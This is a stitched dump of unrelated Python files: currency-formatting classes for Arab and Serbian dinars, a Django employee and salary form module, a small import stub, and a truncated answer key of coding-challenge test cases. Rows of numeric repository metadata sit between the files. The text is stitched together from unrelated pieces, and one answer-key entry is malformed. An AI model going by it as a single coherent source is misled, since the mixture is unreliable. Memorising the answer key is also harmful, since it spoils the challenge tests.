decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'AlgerianDinar':
"""Class creator.
Returns:
AlgerianDinar: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='DZD',
numeric_code='012',
symbol='د.ج.',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='د.ج.',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class IraqiDinar(Currency):
"""Iraqi Dinar currency representation.
Simple usage example:
>>> from multicurrency import IraqiDinar
>>> iraqi_dinar = IraqiDinar(
... amount=123456.789)
>>> print(iraqi_dinar)
د.ع. ١٢٣٬٤٥٦٫٧٨٩
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 3,
decimal_sign (str, optional): Decimal symbol. Defaults to '٫'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '٬'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 3,
decimal_sign: Optional[str] = '\u066B',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u066C',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'IraqiDinar':
"""Class creator.
Returns:
IraqiDinar: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='IQD',
numeric_code='368',
symbol='د.ع.',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='د.ع.',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='٠١٢٣٤٥٦٧٨٩-',
international=international)
class JordanianDinar(Currency):
"""Jordanian Dinar currency representation.
Simple usage example:
>>> from multicurrency import JordanianDinar
>>> jordanian_dinar = JordanianDinar(
... amount=123456.789)
>>> print(jordanian_dinar)
د.أ. ١٢٣٬٤٥٦٫٧٨٩
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 3,
decimal_sign (str, optional): Decimal symbol. Defaults to '٫'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '٬'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 3,
decimal_sign: Optional[str] = '\u066B',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u066C',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'JordanianDinar':
"""Class creator.
Returns:
JordanianDinar: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='JOD',
numeric_code='400',
symbol='د.أ.',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='د.أ.',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='٠١٢٣٤٥٦٧٨٩-',
international=international)
class KuwaitiDinar(Currency):
"""Kuwaiti Dinar currency representation.
Simple usage example:
>>> from multicurrency import KuwaitiDinar
>>> kuwaiti_dinar = KuwaitiDinar(
... amount=123456.789)
>>> print(kuwaiti_dinar)
د.ك. ١٢٣٬٤٥٦٫٧٨٩
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 3,
decimal_sign (str, optional): Decimal symbol. Defaults to '٫'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '٬'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 3,
decimal_sign: Optional[str] = '\u066B',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u066C',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'KuwaitiDinar':
"""Class creator.
Returns:
KuwaitiDinar: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='KWD',
numeric_code='414',
symbol='د.ك.',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='د.ك.',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='٠١٢٣٤٥٦٧٨٩-',
international=international)
class LibyanDinar(Currency):
"""Libyan Dinar currency representation.
Simple usage example:
>>> from multicurrency import LibyanDinar
>>> libyan_dinar = LibyanDinar(
... amount=123456.789)
>>> print(libyan_dinar)
د.ل. 123.456,789
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 3,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 3,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'LibyanDinar':
"""Class creator.
Returns:
LibyanDinar: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='LYD',
numeric_code='434',
symbol='د.ل.',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='د.ل.',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class SerbianDinarXK(Currency):
"""Serbian Dinar XK currency representation.
Simple usage example:
>>> from multicurrency import SerbianDinarXK
>>> serbian_dinar_xk = SerbianDinarXK(
... amount=123456.789)
>>> print(serbian_dinar_xk)
123.456,79 дин.
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'SerbianDinarXK':
"""Class creator.
Returns:
SerbianDinarXK: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='RSD',
numeric_code='941',
symbol='дин.',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='дин.',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class SerbianDinarSR(Currency):
"""Serbian Dinar SR currency representation.
Simple usage example:
>>> from multicurrency import SerbianDinarSR
>>> serbian_dinar_sr = SerbianDinarSR(
... amount=123456.789)
>>> print(serbian_dinar_sr)
123 456,79 дин.
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'SerbianDinarSR':
"""Class creator.
Returns:
SerbianDinarSR: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='RSD',
numeric_code='941',
symbol='дин.',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='дин.',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class TunisianDinar(Currency):
"""Tunisian Dinar currency representation.
Simple usage example:
>>> from multicurrency import TunisianDinar
>>> tunisian_dinar = TunisianDinar(
... amount=123456.789)
>>> print(tunisian_dinar)
د.ت. 123.456,789
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 3,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 3,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'TunisianDinar':
"""Class creator.
Returns:
TunisianDinar: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='TND',
numeric_code='788',
symbol='د.ت.',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='د.ت.',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
| 36.561139
| 77
| 0.596921
| 2,181
| 21,827
| 5.810179
| 0.068776
| 0.049716
| 0.034091
| 0.026989
| 0.868213
| 0.868213
| 0.863163
| 0.863163
| 0.85322
| 0.815657
| 0
| 0.021526
| 0.308288
| 21,827
| 596
| 78
| 36.622483
| 0.816731
| 0.499015
| 0
| 0.803922
| 0
| 0
| 0.041069
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035294
| false
| 0
| 0.011765
| 0
| 0.152941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb896e4a057d40d11d1e004ea41d62e6bba70b94
| 10,397
|
py
|
Python
|
employees/forms.py
|
OSAMAMOHAMED1234/employee_system
|
290cd33c32b84c2e79f27a11bc3a6f0f74bfcc18
|
[
"MIT"
] | 3
|
2019-04-10T05:58:41.000Z
|
2020-03-19T09:44:02.000Z
|
employees/forms.py
|
bertocarl/employee_management_system
|
2b1f3b6070557d70ea415ce8bd76b8ab81a9e1f8
|
[
"MIT"
] | 6
|
2020-06-05T21:47:22.000Z
|
2022-03-11T23:51:07.000Z
|
employees/forms.py
|
cliffnyendwe/time-management-system
|
fb23e1ca537aaa8d153364a30d83f01cb7a3f64b
|
[
"MIT"
] | 3
|
2018-08-03T05:58:35.000Z
|
2019-10-09T13:57:25.000Z
|
from django import forms
from .models import Employees, Relationship
class AddEmployeeForm(forms.ModelForm):
first_name = forms.CharField(label='First name', widget=forms.TextInput(
attrs={
'placeholder': 'First name',
'class': 'form-control',
}))
middle_name = forms.CharField(label='Middle name', widget=forms.TextInput(
attrs={
'placeholder': 'Middle name',
'class': 'form-control',
}))
last_name = forms.CharField(label='Last name', widget=forms.TextInput(
attrs={
'placeholder': 'Last name',
'class': 'form-control',
}))
full_name = forms.CharField(label='Full name', widget=forms.TextInput(
attrs={
'placeholder': 'Full name',
'class': 'form-control',
}))
national_identifier = forms.IntegerField(label='National Identifier', widget=forms.TextInput(
attrs={
'placeholder': 'National Identifier',
'class': 'form-control',
'type': 'number',
}))
age = forms.IntegerField(label='Age', widget=forms.TextInput(
attrs={
'placeholder': 'Age',
'class': 'form-control',
'type': 'number',
}))
date_of_birth = forms.DateField(label='Date Of Birth', widget=forms.TextInput(
attrs={
'placeholder': 'Date Of Birth',
'class': 'form-control',
'type': 'date',
}))
place_of_birth = forms.CharField(label='Place Of Birth', widget=forms.TextInput(
attrs={
'placeholder': 'Place Of Birth',
'class': 'form-control',
}))
job = forms.CharField(label='Job', required=False, widget=forms.TextInput(
attrs={
'placeholder': 'Job',
'class': 'form-control',
}))
country = forms.CharField(label='Country', widget=forms.TextInput(
attrs={
'placeholder': 'Country',
'class': 'form-control',
}))
nationality = forms.CharField(label='Nationality', widget=forms.TextInput(
attrs={
'placeholder': 'Nationality',
'class': 'form-control',
}))
salary = forms.IntegerField(label='Salary', widget=forms.TextInput(
attrs={
'placeholder': 'Salary',
'class': 'form-control',
'type': 'number',
}))
class Meta:
model = Employees
fields = [
'first_name',
'middle_name',
'last_name',
'full_name',
'national_identifier',
'age',
'gender',
'date_of_birth',
'place_of_birth',
'position',
'job',
'country',
'nationality',
'marital_status',
'salary',
]
def clean_national_identifier(self):
national_identifier = self.cleaned_data.get('national_identifier')
qs = Employees.objects.filter(national_identifier__iexact=national_identifier)
if qs.exists():
raise forms.ValidationError('This Employee is already Added before!')
if int(national_identifier) <= 0:
raise forms.ValidationError('National Identifier must be bigger than 0!')
if len(str(national_identifier)) < 14 or len(str(national_identifier)) > 14:
raise forms.ValidationError('National Identifier must be 14 number!')
return int(national_identifier)
def clean_salary(self):
salary = self.cleaned_data.get('salary')
position = self.cleaned_data.get('position')
if position == 'Employee':
if int(salary) < 5000 or int(salary) > 10000:
raise forms.ValidationError('salary for employee must be between 5000-10000')
if position == 'Manager':
if int(salary) < 10000 or int(salary) > 19000:
raise forms.ValidationError('salary for manager must be between 10000-19000')
if position == 'CEO':
if int(salary) < 19000 or int(salary) > 25000:
raise forms.ValidationError('salary for CEO must be between 19000-25000')
return salary
class UpdateEmployeeForm(forms.ModelForm):
first_name = forms.CharField(label='First name', widget=forms.TextInput(
attrs={
'placeholder': 'First name',
'class': 'form-control',
}))
middle_name = forms.CharField(label='Middle name', widget=forms.TextInput(
attrs={
'placeholder': 'Middle name',
'class': 'form-control',
}))
last_name = forms.CharField(label='Last name', widget=forms.TextInput(
attrs={
'placeholder': 'Last name',
'class': 'form-control',
}))
full_name = forms.CharField(label='Full name', widget=forms.TextInput(
attrs={
'placeholder': 'Full name',
'class': 'form-control',
}))
national_identifier = forms.IntegerField(label='National Identifier', widget=forms.TextInput(
attrs={
'placeholder': 'National Identifier',
'class': 'form-control',
'type': 'number',
}))
age = forms.IntegerField(label='Age', widget=forms.TextInput(
attrs={
'placeholder': 'Age',
'class': 'form-control',
'type': 'number',
}))
date_of_birth = forms.DateField(label='Date Of Birth', widget=forms.TextInput(
attrs={
'placeholder': 'Date Of Birth',
'class': 'form-control',
'type': 'date',
}))
place_of_birth = forms.CharField(label='Place Of Birth', widget=forms.TextInput(
attrs={
'placeholder': 'Place Of Birth',
'class': 'form-control',
}))
job = forms.CharField(label='Job', required=False, widget=forms.TextInput(
attrs={
'placeholder': 'Job',
'class': 'form-control',
}))
country = forms.CharField(label='Country', widget=forms.TextInput(
attrs={
'placeholder': 'Country',
'class': 'form-control',
}))
nationality = forms.CharField(label='Nationality', widget=forms.TextInput(
attrs={
'placeholder': 'Nationality',
'class': 'form-control',
}))
class Meta:
model = Employees
fields = [
'first_name',
'middle_name',
'last_name',
'full_name',
'national_identifier',
'age',
'gender',
'date_of_birth',
'place_of_birth',
'position',
'job',
'country',
'nationality',
'marital_status',
]
def clean_national_identifier(self):
national_identifier = self.cleaned_data.get('national_identifier')
if int(national_identifier) <= 0:
raise forms.ValidationError('National Identifier must be bigger than 0!')
if len(str(national_identifier)) < 14 or len(str(national_identifier)) > 14:
raise forms.ValidationError('National Identifier must be 14 number!')
return int(national_identifier)
class UpdateSalaryForm(forms.ModelForm):
position = forms.CharField(widget=forms.HiddenInput)
salary = forms.IntegerField(label='Salary', widget=forms.TextInput(
attrs={
'placeholder': 'Salary',
'class': 'form-control',
'type': 'number',
}))
deduction = forms.IntegerField(label='Deduction', widget=forms.TextInput(
attrs={
'placeholder': 'Deduction',
'class': 'form-control',
'type': 'number',
}))
deduction_description = forms.CharField(label='Deduction Description', required=False, widget=forms.Textarea(
attrs={
'placeholder': 'Deduction Description',
'class': 'form-control',
}))
earning = forms.IntegerField(label='Earning', widget=forms.TextInput(
attrs={
'placeholder': 'Earning',
'class': 'form-control',
'type': 'number',
}))
earning_description = forms.CharField(label='Earning Description', required=False, widget=forms.Textarea(
attrs={
'placeholder': 'Earning Description',
'class': 'form-control',
}))
class Meta:
model = Employees
fields = [
'position',
'salary',
'deduction',
'deduction_description',
'earning',
'earning_description',
]
def clean_salary(self):
salary = self.cleaned_data.get('salary')
position = self.cleaned_data.get('position')
if position == 'Employee':
if int(salary) < 5000 or int(salary) > 10000:
raise forms.ValidationError('salary for employee must be between 5000-10000')
if position == 'Manager':
if int(salary) < 10000 or int(salary) > 19000:
raise forms.ValidationError('salary for manager must be between 10000-19000')
if position == 'CEO':
if int(salary) < 19000 or int(salary) > 25000:
raise forms.ValidationError('salary for CEO must be between 19000-25000')
return salary
class AddRelationForm(forms.ModelForm):
name = forms.CharField(label='Name', widget=forms.TextInput(
attrs={
'placeholder': 'Name',
'class': 'form-control',
}))
age = forms.IntegerField(label='Age', widget=forms.TextInput(
attrs={
'placeholder': 'Age',
'class': 'form-control',
'type': 'number',
}))
date_of_birth = forms.DateField(label='Date Of Birth', widget=forms.TextInput(
attrs={
'placeholder': 'Date Of Birth',
'class': 'form-control',
'type': 'date',
}))
class Meta:
model = Relationship
fields = [
'relationship_type',
'name',
'age',
'date_of_birth',
]
def clean_age(self):
age = self.cleaned_data.get('age')
if int(age) <= 0:
raise forms.ValidationError('Age must be bigger than 0!')
return age
| 35.244068
| 113
| 0.552563
| 967
| 10,397
| 5.861427
| 0.097208
| 0.062103
| 0.087509
| 0.127911
| 0.854446
| 0.834157
| 0.819337
| 0.819337
| 0.790579
| 0.790579
| 0
| 0.018839
| 0.31586
| 10,397
| 294
| 114
| 35.363946
| 0.778012
| 0
| 0
| 0.870036
| 0
| 0
| 0.247956
| 0.00202
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018051
| false
| 0
| 0.00722
| 0
| 0.187726
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cbbe75b3332ba82c0b221a3037d3492817984982
| 120
|
py
|
Python
|
tests/_projects/a_references_b_b_references_a/a_module.py
|
marek-trmac/pycycle
|
f477e70b7a6875eada05475c27bc20d19587d585
|
[
"MIT"
] | 319
|
2017-01-28T19:29:16.000Z
|
2022-03-18T08:45:42.000Z
|
tests/_projects/a_references_b_b_references_a/a_module.py
|
marek-trmac/pycycle
|
f477e70b7a6875eada05475c27bc20d19587d585
|
[
"MIT"
] | 18
|
2017-01-31T14:12:38.000Z
|
2022-03-08T12:15:10.000Z
|
tests/_projects/a_references_b_b_references_a/a_module.py
|
marek-trmac/pycycle
|
f477e70b7a6875eada05475c27bc20d19587d585
|
[
"MIT"
] | 31
|
2017-01-29T19:52:15.000Z
|
2022-03-09T13:32:33.000Z
|
from b_module import some_func
from some_package.c_module import some_third_func
def some_other_func():
some_func()
| 24
| 49
| 0.825
| 21
| 120
| 4.285714
| 0.52381
| 0.266667
| 0.355556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 120
| 5
| 50
| 24
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
cbc2b551e67bbef190c14f4c47e5556bffe28a3c
| 9,261
|
py
|
Python
|
source/solution.py
|
guglielmogattiglio/py_submit_plat
|
08aae2e3622f297a6553455dee5eba50cc8d3b66
|
[
"BSD-2-Clause"
] | 1
|
2019-10-19T14:10:58.000Z
|
2019-10-19T14:10:58.000Z
|
source/solution.py
|
guglielmogattiglio/py_submit_plat
|
08aae2e3622f297a6553455dee5eba50cc8d3b66
|
[
"BSD-2-Clause"
] | null | null | null |
source/solution.py
|
guglielmogattiglio/py_submit_plat
|
08aae2e3622f297a6553455dee5eba50cc8d3b66
|
[
"BSD-2-Clause"
] | null | null | null |
'''
instructions: the number corresponds to the challenge id. The corresponding list is a list of tuples, i.e. one tuple per test case.
Each test is made by inputs, which notice are enclosed within a tuple, and expected output.
'''
my_solutions = {1: [
[([0,0,0,0],),0.0],
[([1,0,1,0],),1.4142135623730951],
[([1,10,6,4],),9.219544457292887],
[([4,8,5,9],), 5.656854249492381],
[([7,7,6,6],),0.0]
],
2: [
[('Land',),'La La Land'],
[('Milan Merda',),'Mi Mi Milan Merda'],
[('Fozza Inda',), 'Fo Fo Fozza Inda'],
[('Moonlight'), 'Moo Moo Moonlight'],
[('Ciao Ettori',), 'Ciao Ciao Ciao Ettori']
],
3: [
[(5,), '--------e--------\n------e-d-e------\n----e-d-c-d-e----\n--e-d-c-b-c-d-e--\ne-d-c-b-a-b-c-d-e\n--e-d-c-b-c-d-e--\n----e-d-c-d-e----\n------e-d-e------\n--------e--------'], #first test case
[(12,), '----------------------l----------------------\n--------------------l-k-l--------------------\n------------------l-k-j-k-l------------------\n----------------l-k-j-i-j-k-l----------------\n--------------l-k-j-i-h-i-j-k-l--------------\n------------l-k-j-i-h-g-h-i-j-k-l------------\n----------l-k-j-i-h-g-f-g-h-i-j-k-l----------\n--------l-k-j-i-h-g-f-e-f-g-h-i-j-k-l--------\n------l-k-j-i-h-g-f-e-d-e-f-g-h-i-j-k-l------\n----l-k-j-i-h-g-f-e-d-c-d-e-f-g-h-i-j-k-l----\n--l-k-j-i-h-g-f-e-d-c-b-c-d-e-f-g-h-i-j-k-l--\nl-k-j-i-h-g-f-e-d-c-b-a-b-c-d-e-f-g-h-i-j-k-l\n--l-k-j-i-h-g-f-e-d-c-b-c-d-e-f-g-h-i-j-k-l--\n----l-k-j-i-h-g-f-e-d-c-d-e-f-g-h-i-j-k-l----\n------l-k-j-i-h-g-f-e-d-e-f-g-h-i-j-k-l------\n--------l-k-j-i-h-g-f-e-f-g-h-i-j-k-l--------\n----------l-k-j-i-h-g-f-g-h-i-j-k-l----------\n------------l-k-j-i-h-g-h-i-j-k-l------------\n--------------l-k-j-i-h-i-j-k-l--------------\n----------------l-k-j-i-j-k-l----------------\n------------------l-k-j-k-l------------------\n--------------------l-k-l--------------------\n----------------------l----------------------'], #second test case
[(2,), '--b--\nb-a-b\n--b--'],
[(15,), '----------------------------o----------------------------\n--------------------------o-n-o--------------------------\n------------------------o-n-m-n-o------------------------\n----------------------o-n-m-l-m-n-o----------------------\n--------------------o-n-m-l-k-l-m-n-o--------------------\n------------------o-n-m-l-k-j-k-l-m-n-o------------------\n----------------o-n-m-l-k-j-i-j-k-l-m-n-o----------------\n--------------o-n-m-l-k-j-i-h-i-j-k-l-m-n-o--------------\n------------o-n-m-l-k-j-i-h-g-h-i-j-k-l-m-n-o------------\n----------o-n-m-l-k-j-i-h-g-f-g-h-i-j-k-l-m-n-o----------\n--------o-n-m-l-k-j-i-h-g-f-e-f-g-h-i-j-k-l-m-n-o--------\n------o-n-m-l-k-j-i-h-g-f-e-d-e-f-g-h-i-j-k-l-m-n-o------\n----o-n-m-l-k-j-i-h-g-f-e-d-c-d-e-f-g-h-i-j-k-l-m-n-o----\n--o-n-m-l-k-j-i-h-g-f-e-d-c-b-c-d-e-f-g-h-i-j-k-l-m-n-o--\no-n-m-l-k-j-i-h-g-f-e-d-c-b-a-b-c-d-e-f-g-h-i-j-k-l-m-n-o\n--o-n-m-l-k-j-i-h-g-f-e-d-c-b-c-d-e-f-g-h-i-j-k-l-m-n-o--\n----o-n-m-l-k-j-i-h-g-f-e-d-c-d-e-f-g-h-i-j-k-l-m-n-o----\n------o-n-m-l-k-j-i-h-g-f-e-d-e-f-g-h-i-j-k-l-m-n-o------\n--------o-n-m-l-k-j-i-h-g-f-e-f-g-h-i-j-k-l-m-n-o--------\n----------o-n-m-l-k-j-i-h-g-f-g-h-i-j-k-l-m-n-o----------\n------------o-n-m-l-k-j-i-h-g-h-i-j-k-l-m-n-o------------\n--------------o-n-m-l-k-j-i-h-i-j-k-l-m-n-o--------------\n----------------o-n-m-l-k-j-i-j-k-l-m-n-o----------------\n------------------o-n-m-l-k-j-k-l-m-n-o------------------\n--------------------o-n-m-l-k-l-m-n-o--------------------\n----------------------o-n-m-l-m-n-o----------------------\n------------------------o-n-m-n-o------------------------\n--------------------------o-n-o--------------------------\n----------------------------o----------------------------'],
[(20,), '--------------------------------------t--------------------------------------\n------------------------------------t-s-t------------------------------------\n----------------------------------t-s-r-s-t----------------------------------\n--------------------------------t-s-r-q-r-s-t--------------------------------\n------------------------------t-s-r-q-p-q-r-s-t------------------------------\n----------------------------t-s-r-q-p-o-p-q-r-s-t----------------------------\n--------------------------t-s-r-q-p-o-n-o-p-q-r-s-t--------------------------\n------------------------t-s-r-q-p-o-n-m-n-o-p-q-r-s-t------------------------\n----------------------t-s-r-q-p-o-n-m-l-m-n-o-p-q-r-s-t----------------------\n--------------------t-s-r-q-p-o-n-m-l-k-l-m-n-o-p-q-r-s-t--------------------\n------------------t-s-r-q-p-o-n-m-l-k-j-k-l-m-n-o-p-q-r-s-t------------------\n----------------t-s-r-q-p-o-n-m-l-k-j-i-j-k-l-m-n-o-p-q-r-s-t----------------\n--------------t-s-r-q-p-o-n-m-l-k-j-i-h-i-j-k-l-m-n-o-p-q-r-s-t--------------\n------------t-s-r-q-p-o-n-m-l-k-j-i-h-g-h-i-j-k-l-m-n-o-p-q-r-s-t------------\n----------t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t----------\n--------t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t--------\n------t-s-r-q-p-o-n-m-l-